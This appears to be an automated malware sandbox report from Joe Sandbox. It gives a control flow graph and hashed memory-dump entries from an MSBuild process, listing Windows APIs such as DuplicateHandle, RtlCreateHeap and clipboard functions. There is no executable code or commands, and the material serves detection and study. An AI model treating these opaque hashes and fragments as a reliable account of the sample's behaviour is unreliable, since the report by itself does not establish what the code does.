                      control_flow_graph 2059 5b6d507-5b6d50b 2060 5b6d50d-5b6d554 2059->2060 2061 5b6d579-5b6d582 2059->2061 2072 5b6d55a-5b6d578 2060->2072 2073 5b6d65b-5b6d687 2060->2073 2062 5b6d584-5b6d585 2061->2062 2063 5b6d588-5b6d598 2061->2063 2065 5b6d586 2062->2065 2066 5b6d68e-5b6d6af 2062->2066 2068 5b6d605-5b6d639 2063->2068 2069 5b6d59a-5b6d59d 2063->2069 2065->2063 2074 5b6d6d1-5b6d6d4 2066->2074 2075 5b6d6b1-5b6d6b3 2066->2075 2138 5b6d63f-5b6d649 2068->2138 2139 5b6d63b 2068->2139 2148 5b6d59f call 5b6f370 2069->2148 2149 5b6d59f call 5b6f360 2069->2149 2072->2061 2073->2066 2080 5b6d834 2074->2080 2081 5b6d6da-5b6d6e0 2074->2081 2078 5b6d6b5-5b6d6b8 2075->2078 2079 5b6d6fc-5b6d701 2075->2079 2077 5b6d5a5-5b6d5af 2077->2066 2084 5b6d5b5-5b6d5fd 2077->2084 2087 5b6d77e-5b6d784 2078->2087 2088 5b6d6be-5b6d6c4 2078->2088 2085 5b6d839-5b6d83c 2079->2085 2080->2085 2082 5b6d6e2 2081->2082 2083 5b6d6e9-5b6d6ef 2081->2083 2082->2083 2090 5b6d7f5-5b6d7fa 2082->2090 2091 5b6d7d2-5b6d7d7 2082->2091 2092 5b6d81f-5b6d824 2082->2092 2093 5b6d7fc-5b6d801 2082->2093 2094 5b6d83d-5b6d876 2082->2094 2095 5b6d7bd-5b6d7c2 2082->2095 2096 5b6d818-5b6d81d 2082->2096 2097 5b6d7d9-5b6d7de 2082->2097 2098 5b6d826-5b6d82b 2082->2098 2099 5b6d7e7-5b6d7ec 2082->2099 2100 5b6d7c4-5b6d7c9 2082->2100 2101 5b6d7e0-5b6d7e5 2082->2101 2102 5b6d7ee-5b6d7f3 2082->2102 2103 5b6d82d-5b6d832 2082->2103 2104 5b6d7cb-5b6d7d0 2082->2104 2083->2094 2107 5b6d6f5 2083->2107 2084->2068 2105 5b6d786-5b6d78b 2087->2105 2106 5b6d790-5b6d795 2087->2106 2088->2094 2109 5b6d6ca 2088->2109 2090->2085 2091->2085 2092->2085 2093->2085 2095->2085 2096->2085 2097->2085 2098->2085 2099->2085 2100->2085 2101->2085 2102->2085 2103->2085 2104->2085 2105->2085 2106->2085 2107->2079 2107->2092 2107->2096 2107->2098 2109->2074 2109->2090 2109->2091 2109->2092 2109->2093 2109->2094 2109->2095 2109->2096 2109->2097 2109->2098 2109->2099 2109->2100 2109->2101 2109->2102 2109->2103 2109->2104 2113 5b6d774-5b6d779 2109->2113 2114 5b6d738-5b6d73d 2109->2114 2115 5b6d724-5b6d729 2109->2115 2116 5b6d7a4-5b6d7aa 2109->2116 2117 5b6d760-5b6d765 2109->2117 2118 5b6d72e-5b6d733 2109->2118 2119 5b6d76a-5b6d76f 2109->2119 2120 5b6d756-5b6d75b 2109->2120 2121 5b6d710-5b6d715 2109->2121 2122 5b6d811-5b6d816 2109->2122 2123 5b6d71a-5b6d71f 2109->2123 2124 5b6d79a-5b6d79f 2109->2124 2125 5b6d706-5b6d70b 2109->2125 2126 5b6d742-5b6d747 2109->2126 2127 5b6d803-5b6d808 2109->2127 2128 5b6d74c-5b6d751 2109->2128 2129 5b6d80a-5b6d80f 2109->2129 2113->2085 2114->2085 2115->2085 2132 5b6d7b6-5b6d7bb 2116->2132 2133 5b6d7ac-5b6d7b1 2116->2133 2117->2085 2118->2085 2119->2085 2120->2085 2121->2085 2122->2085 2123->2085 2124->2085 2125->2085 2126->2085 2127->2085 2128->2085 2129->2085 2132->2085 2133->2085 2143 5b6d651-5b6d658 2138->2143 2139->2138 2148->2077 2149->2077
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: Hp$U
                      • API String ID: 0-3784902443
                      • Opcode ID: c2c88ae78021085f34d539d654deb0bddb3a07b46cab0a1e93f9d3bbbe87d1b3
                      • Instruction ID: b00e6ee3a72d2503fde3948904d91444f7441356434dbe7109a31f2577c3f720
                      • Opcode Fuzzy Hash: c2c88ae78021085f34d539d654deb0bddb3a07b46cab0a1e93f9d3bbbe87d1b3
                      • Instruction Fuzzy Hash: DB91A130B08255CFD711EBA9E45D7793BA2EF42311F4541EBE84A8B292CE2CAD46C752
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: D$U
                      • API String ID: 0-1648081107
                      • Opcode ID: 16674409a22dc0e097f1fefe3cff4917e385fa3ca5e788770c0f8bc2b882a8aa
                      • Instruction ID: a88505994917fd2808a56e4207947c8221a4e31d2b4b563f616902e87c963060
                      • Opcode Fuzzy Hash: 16674409a22dc0e097f1fefe3cff4917e385fa3ca5e788770c0f8bc2b882a8aa
                      • Instruction Fuzzy Hash: 79118132B042088BDB259FA4D8586EEBBB6FB88325F244069D946F3284DF795C45CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: Hbp
                      • API String ID: 0-4031464453
                      • Opcode ID: e5c53148c59fc605519d00aaad80e28dddaed240cc39c6d2ed6480fac0869900
                      • Instruction ID: a8b76207a3b912e47fdd62681da4f800d819d754b245865a3755670b66f676c4
                      • Opcode Fuzzy Hash: e5c53148c59fc605519d00aaad80e28dddaed240cc39c6d2ed6480fac0869900
                      • Instruction Fuzzy Hash: 90422574A006059FCB15CF68C584AAEBFF2FF88350B5585E9E45AAB261DB30FC41CB94
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c60e936e819128b77ebc3910e42bb6ada6e90a340c47c03a709b342ef3e6859b
                      • Instruction ID: cacc3b0d88d622c468d91630bfe6c87f531f1d5646279ae517753eed90e9e093
                      • Opcode Fuzzy Hash: c60e936e819128b77ebc3910e42bb6ada6e90a340c47c03a709b342ef3e6859b
                      • Instruction Fuzzy Hash: 9A610274E01218CFDB14DFA9D584AAEFBB2BF89300F609429E419BB294DB749942CF54
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 964b50acdb0d8daefefe1e56faa2a38305b79c52d3a3f7a9e16dadc1b512ec2b
                      • Instruction ID: 43f142e4f033f8176962c7695eca953edede72e3fee8a49b4c1478e273a2656c
                      • Opcode Fuzzy Hash: 964b50acdb0d8daefefe1e56faa2a38305b79c52d3a3f7a9e16dadc1b512ec2b
                      • Instruction Fuzzy Hash: A5719C74E012189FCB04DFA9D584ADEBBF2BF88300F24956AE815B7354DB35AA41CF50
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: $p
                      • API String ID: 0-982128392
                      • Opcode ID: c0e9e8574ece9304b292f975a9b12a32feae7d703e9b1895e0d4dab08346d5be
                      • Instruction ID: 139355dc865a4b6423a222c93569e884ac147e4da50016c5fad1000953c4574a
                      • Opcode Fuzzy Hash: c0e9e8574ece9304b292f975a9b12a32feae7d703e9b1895e0d4dab08346d5be
                      • Instruction Fuzzy Hash: 0FE10F34B106158FCB14DF68C494AAEBBF6FF89640B2481A9E906EB355DF35EC01CB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ec1a1273207f990580fd307083177e9b5ee5e9da6eff71228053e6eb5b438c0f
                      • Instruction ID: de626219eebc2fa8ad7cb6993ca8cb708b2961cd4668efff257ee741391ab5f8
                      • Opcode Fuzzy Hash: ec1a1273207f990580fd307083177e9b5ee5e9da6eff71228053e6eb5b438c0f
                      • Instruction Fuzzy Hash: C151E274E00208DFDB08DFA9D984A9EFBF2BF88304F149529E405AB2A4DB749945CF54
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C010B0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 0916d3f47fd9e47af6d5791cb908e12f662cd656afbc460771a0dcbb1a2d70be
                      • Instruction ID: 71d75c99e1df9f8fd58a408bb0fd03579c201fc23020f2668153974fe547af40
                      • Opcode Fuzzy Hash: 0916d3f47fd9e47af6d5791cb908e12f662cd656afbc460771a0dcbb1a2d70be
                      • Instruction Fuzzy Hash: A4419BB5D042589FCF10CFA9D980AEEFBF1BB19310F14A41AE814B7250D375A945CF64
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C010B0
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: a1766a66854dbe8e7c1ef95c620980ab1e0a4366d70d701a6192aa2322031866
                      • Instruction ID: 631353deb511febf4c484f96230245cfc07d3f26c7615a5e29bfb96ba9be3500
                      • Opcode Fuzzy Hash: a1766a66854dbe8e7c1ef95c620980ab1e0a4366d70d701a6192aa2322031866
                      • Instruction Fuzzy Hash: F04199B9D042589FCF10CFAAD980AEEFBF1BB09310F14A42AE814B7250D375A945CF64
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9ee05f1bc25393612b1d7e22194b36247b077021fee78df3b24c3a8ef497260e
                      • Instruction ID: 080c875c06c6cc597722445bc57d8b41446df467c8caa60e621e21e94f34b211
                      • Opcode Fuzzy Hash: 9ee05f1bc25393612b1d7e22194b36247b077021fee78df3b24c3a8ef497260e
                      • Instruction Fuzzy Hash: 4A41C074E00208DBDB18DFAAD584ADEBBF2BF88300F15D52AE404BB295DB349945CF54
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D0DA5B
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: bea2f5db1be47b33029508a317dbd10ce7bb7b07edefa5747956b55cfaa9a539
                      • Instruction ID: d0fcc0414e9c0aa6e448cae6accdabc3532c9b1727a6b93495fc6da2d3bd4370
                      • Opcode Fuzzy Hash: bea2f5db1be47b33029508a317dbd10ce7bb7b07edefa5747956b55cfaa9a539
                      • Instruction Fuzzy Hash: C04175B9D042589FCB10CFA9D984ADEBBF5BB09310F14942AE918AB350D335A945CF94
                      APIs
                      • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 05C033FF
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: bc74cda02585d3fa0492bfd34c991ddb0aca7b4c7a20d664e581bc6fcf4090b3
                      • Instruction ID: 8db6dbe7ccf6778119c5386fdd5e1aff04becf99c58abac5a1dd221c3bc0ea9a
                      • Opcode Fuzzy Hash: bc74cda02585d3fa0492bfd34c991ddb0aca7b4c7a20d664e581bc6fcf4090b3
                      • Instruction Fuzzy Hash: 434159B9D012589FCF10CFA9D984A9EFBB5EF09310F14A41AE818BB310D735A945CF64
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D0DA5B
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: fd1905a25eb8e9faf81373bffcb997add8cd26653cf145527861718e5cc8d19c
                      • Instruction ID: 352caddba786df8cee8419767d071083edf8e69b53c29a03f718e9b9f8a6573a
                      • Opcode Fuzzy Hash: fd1905a25eb8e9faf81373bffcb997add8cd26653cf145527861718e5cc8d19c
                      • Instruction Fuzzy Hash: 6F4175B9D002589FCB10CFA9D984ADEFBF5BF09310F14902AE918AB310D335A945CF54
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: Clipboard
                      • String ID:
                      • API String ID: 220874293-0
                      • Opcode ID: e9ceda950b9773344e299a8393412f58cfcdb8df137ae7ee7403201321e97be0
                      • Instruction ID: f66c2c6b5504fe7fc8b76649a4da21817cb7dbb84b699b45780d03b3bd858778
                      • Opcode Fuzzy Hash: e9ceda950b9773344e299a8393412f58cfcdb8df137ae7ee7403201321e97be0
                      • Instruction Fuzzy Hash: 59419AB0D012489FDB14CFA9C984BDEBBF5EF49300F20942AE505AB2A4E775A985CF54
                      APIs
                      • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 05C033FF
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: 929c8bda06bf5d24f7ca964a8ed2ff7be80a322ca863c42a99785ce044ca0092
                      • Instruction ID: ce783d73dc3c32323cbbe7c7443e4591a7d874e6ffeb7d2187f8a93badbc505a
                      • Opcode Fuzzy Hash: 929c8bda06bf5d24f7ca964a8ed2ff7be80a322ca863c42a99785ce044ca0092
                      • Instruction Fuzzy Hash: 534148B9D052589FCF10CFA9D584A9EFBB1EF09310F24A42AE819BB310D735A945CF64
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: dc72c1a0f5d76de3c4da540dc261c9d6a214198cd643eede3fb6416a942da278
                      • Instruction ID: 53004d7f1a9ea08a52a28f581c15d57f5ab6d58d32d79d254eb6297fbb8acf68
                      • Opcode Fuzzy Hash: dc72c1a0f5d76de3c4da540dc261c9d6a214198cd643eede3fb6416a942da278
                      • Instruction Fuzzy Hash: B741DEB4E00208DFDB18DFA9D584ADEBBB2BF89304F20912AE404BB354DB755842CB54
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ca834bbd7724ca62f0011ce9483d9b3717a09d69c55869fe6fe68cd3b7223da2
                      • Instruction ID: 3fbe729edee7dc6000a693fd554b080f356bb068f9f4e04856fd01b32eb11e1d
                      • Opcode Fuzzy Hash: ca834bbd7724ca62f0011ce9483d9b3717a09d69c55869fe6fe68cd3b7223da2
                      • Instruction Fuzzy Hash: F641ED74E00218DFDB18DFA9D584ADEBBB2BF89304F20802AE404BB354DB359842CB54
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: Clipboard
                      • String ID:
                      • API String ID: 220874293-0
                      • Opcode ID: bf32beb2ddfc8b814e7c1f37f53abac2d4f5d84338dbbd4121ebfa2ce4fea403
                      • Instruction ID: 91f9cdaa4778584844ca6145285423da7bc695957ea92b36f0751af1b2f72c2d
                      • Opcode Fuzzy Hash: bf32beb2ddfc8b814e7c1f37f53abac2d4f5d84338dbbd4121ebfa2ce4fea403
                      • Instruction Fuzzy Hash: 51419BB0D012489FDB14CFA9C984B9EBBF5EF49300F20942AE505BB3A4E775A985CF54
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c8bf5e4811278f5c0f128f56614155a21cd686ceacb90bd91b8e4d1d8cdefc07
                      • Instruction ID: 1aa806762b854c5a2c0c80186e84db3744d6e04233cc81544af559b78ef4e440
                      • Opcode Fuzzy Hash: c8bf5e4811278f5c0f128f56614155a21cd686ceacb90bd91b8e4d1d8cdefc07
                      • Instruction Fuzzy Hash: 9841EF74E01218DFDB58DFA9D584ADEBBF2AF89304F20812AE815BB364DB355846CF14
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: f566d36897b8a704e6d846dc9f33035dd5a143f357441b02cd211d27edeaba79
                      • Instruction ID: 06cc189bb759d51664099ee66d1df8c6bb9c767e51d68e971abd22ecc8f53786
                      • Opcode Fuzzy Hash: f566d36897b8a704e6d846dc9f33035dd5a143f357441b02cd211d27edeaba79
                      • Instruction Fuzzy Hash: 9E41C0B4E00218DFDB18DFA9D584ADEBBF2BF89304F24952AE805BB354DB745842CB44
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581361946.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5c00000_MSBuild.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: f4e41f67baf6383379fa464ba89a71f46dd0b76c53a8d75c9cfbace0c6b0e425
                      • Instruction ID: e33d5639d3c86914a1cb3c465cff06f4031c27b2e7173f73249c794d5e573cef
                      • Opcode Fuzzy Hash: f4e41f67baf6383379fa464ba89a71f46dd0b76c53a8d75c9cfbace0c6b0e425
                      • Instruction Fuzzy Hash: 1341F274E002189FCB18CFAAD544ADEFBF2BF89310F24916AE815A73A5DB359941CF50
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 29c8eead96460240fbc4ed7e01d75c9dd80a6d6db15434a02e14fc2cc340b236
                      • Instruction ID: 2b877bcd7ed59813d8c0e15d8295eae8a8a5bb939e6923e62dcf7e214b9b4675
                      • Opcode Fuzzy Hash: 29c8eead96460240fbc4ed7e01d75c9dd80a6d6db15434a02e14fc2cc340b236
                      • Instruction Fuzzy Hash: 7731E9B4D042589FCB20CFAAE880A9EFBF4EF09310F14945AE824B7350D335A846CF64
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581185222.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5bc0000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: &
                      • API String ID: 0-1010288
                      • Opcode ID: ad266e5ce1b7428159ff1eb72b1000ff069410f0ced31a1e1f8ae28d6668f059
                      • Instruction ID: d5e3de2e15514a5aaf232cc756f151f663e2c526a4532fb97a9942bcdcfce571
                      • Opcode Fuzzy Hash: ad266e5ce1b7428159ff1eb72b1000ff069410f0ced31a1e1f8ae28d6668f059
                      • Instruction Fuzzy Hash: 78B18C793142029FDB19DF64856543EBAA3BFC82407448AEDE8879B396DF34EC01C7A5
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581519862.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d00000_MSBuild.jbxd
                      Similarity
                      • API ID: Initialize
                      • String ID:
                      • API String ID: 2538663250-0
                      • Opcode ID: 0dfb9343613f4a670087ce8e9387211c6273ab2a0b023756809160496e633286
                      • Instruction ID: e134aba252f850d255407acebd30e6d734a70840eef256b248d382ccb7e1007b
                      • Opcode Fuzzy Hash: 0dfb9343613f4a670087ce8e9387211c6273ab2a0b023756809160496e633286
                      • Instruction Fuzzy Hash: BB31BBB8D002189FCB20CFAAD884A9EFBF5FB09310F10941AE814B7350D375A841CF64
                      APIs
                      • KiUserExceptionDispatcher.NTDLL ref: 011B89B4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: DispatcherExceptionUser
                      • String ID:
                      • API String ID: 6842923-0
                      • Opcode ID: c3336aa9a93bca0bed236d8f27d7eb0e153cba3eb46e158a4b6406eb469c3d55
                      • Instruction ID: 3d011245be5d085e2dbcd4a5632ed341f360e20c67638bd085297405d1697fbb
                      • Opcode Fuzzy Hash: c3336aa9a93bca0bed236d8f27d7eb0e153cba3eb46e158a4b6406eb469c3d55
                      • Instruction Fuzzy Hash: AB11CEB4D04219DFDB08DFA9C4456EEFBF9BB49300F1085AAD914A3250EB745A84CF92
                      APIs
                      • KiUserExceptionDispatcher.NTDLL ref: 011B89B4
                      Memory Dump Source
                      • Source File: 00000002.00000002.4563369442.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_11b0000_MSBuild.jbxd
                      Similarity
                      • API ID: DispatcherExceptionUser
                      • String ID:
                      • API String ID: 6842923-0
                      • Opcode ID: cb7032b17f0ee2c35bb0004136a8924918488c91942595411716621b4085488c
                      • Instruction ID: 50b6fbc6a965bf3db3b7204e209dc488c062b2f501ee33b15afd6749dbdecd83
                      • Opcode Fuzzy Hash: cb7032b17f0ee2c35bb0004136a8924918488c91942595411716621b4085488c
                      • Instruction Fuzzy Hash: CE0100B4C05259DFDB09DFA9D6457EEBFF1AB49300F1484AAC824A3251E7780B48CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: bddf187f0c8099fdbad73fd178e9b6f45dd4506a66978d8512f8b03680d91f6d
                      • Instruction ID: 2f88c095079e7f96a5c53cb290d5d1b6604476ef5be13bd0bd4db193dcbc4cba
                      • Opcode Fuzzy Hash: bddf187f0c8099fdbad73fd178e9b6f45dd4506a66978d8512f8b03680d91f6d
                      • Instruction Fuzzy Hash: 93C14B34600606DFCB24CF18C480D6ABBF2FF89310B95CA99D55A9B6A5D734FC56CB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.4583363757.00000000063A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_63a0000_MSBuild.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 633eece812bd18a3b2160365991adf3b3d0b374bf709b489435071856b5b53d2
                      • Instruction ID: 99b6279de617d141eb0df3ebd6d1e35605bd6fcbd82494fb22d661aff8239e98
                      • Opcode Fuzzy Hash: 633eece812bd18a3b2160365991adf3b3d0b374bf709b489435071856b5b53d2
                      • Instruction Fuzzy Hash: 29D0A7318189480FE795B13C251A3303AE1D7A9115F2546CBD899C3597E8198C458383
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,p
                      • API String ID: 0-2091407873
                      • Opcode ID: 4989099d09aeb91c747fa2b0b1920ad7ed66397189e18249d1684c183785c6f6
                      • Instruction ID: af55371d16b0ec6ece7517926450a95d98d4def60228757f80fd39c7a1a56550
                      • Opcode Fuzzy Hash: 4989099d09aeb91c747fa2b0b1920ad7ed66397189e18249d1684c183785c6f6
                      • Instruction Fuzzy Hash: B6A13F30A102058FDB15DFA4C994AAEBBB2FF88340F148559E946DB364EF74ED06CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: 76b59656eace09aef9c737bd6c772c48e5e50b9726d152a2b36ab0ae75e94fec
                      • Instruction ID: 7922c27656e16c020e9275ba04db51182685e80b981a606aa3a67f42b93f8ed0
                      • Opcode Fuzzy Hash: 76b59656eace09aef9c737bd6c772c48e5e50b9726d152a2b36ab0ae75e94fec
                      • Instruction Fuzzy Hash: F6919A34600A029FD715CF18D48096AF7B6FF88310B14C6A9D96ACB699D730FC52CBD0
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.4581106317.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5b60000_MSBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,p
                      • API String ID: 0-2091407873
                      • Opcode ID: ae2a6b7d12813ba1fcf7206183b74a51418d70ac59e1c014772bacbd296e15b9
                      • Instruction ID: b4b4d075dcfa8a2516beecfc4e3ee277762bb763a0f23b9485838ba6b9b62ff4
                      • Opcode Fuzzy Hash: ae2a6b7d12813ba1fcf7206183b74a51418d70ac59e1c014772bacbd296e15b9
